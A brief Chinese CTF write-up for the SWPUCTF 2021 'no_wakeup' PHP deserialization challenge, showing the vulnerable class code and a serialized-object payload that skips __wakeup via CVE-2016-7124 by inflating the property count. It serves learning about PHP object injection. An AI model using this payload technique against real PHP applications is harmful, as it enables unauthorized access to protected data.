(反序列化)[SWPUCTF 2021 新生赛]no_wakeup

打开题目

复制代码
<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?> 

__destruct->__wakeup(要绕过)

反序列时先检测有没有wakeup方法,有就先调用

但是CVE-2016-7124影响版本:PHP5 < 5.6.25;PHP7 < 7.0.10

p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

即可

相关推荐
汤米粥13 小时前
python学习——核心语法三
java·python·学习
七老板的blog14 小时前
从持久化任务到多 Agent 协作
python·学习·ai
book012114 小时前
华为ensp学习日志 记2026
学习·华为·智能路由器
Huangxy__14 小时前
线程池的学习
学习
小丶舟14 小时前
6GB显卡跑Hermes Agent!开源AI自学习编程Agent实测
人工智能·学习·开源
Bechamz14 小时前
大数据开发学习Day45
大数据·学习
吃好睡好便好15 小时前
说说如何爱护肠道
学习·生活
CoreTK_EMC15 小时前
牙科医疗器械 ESD 静电整改案例|芯通康医疗级方案,护航诊疗安全与合规
网络·学习·emc整改·芯通康
南浦别a15 小时前
第一百一十三天--慢慢改变吧
学习·程序人生
小新同学^O^15 小时前
Redis的简单总结
数据库·redis·学习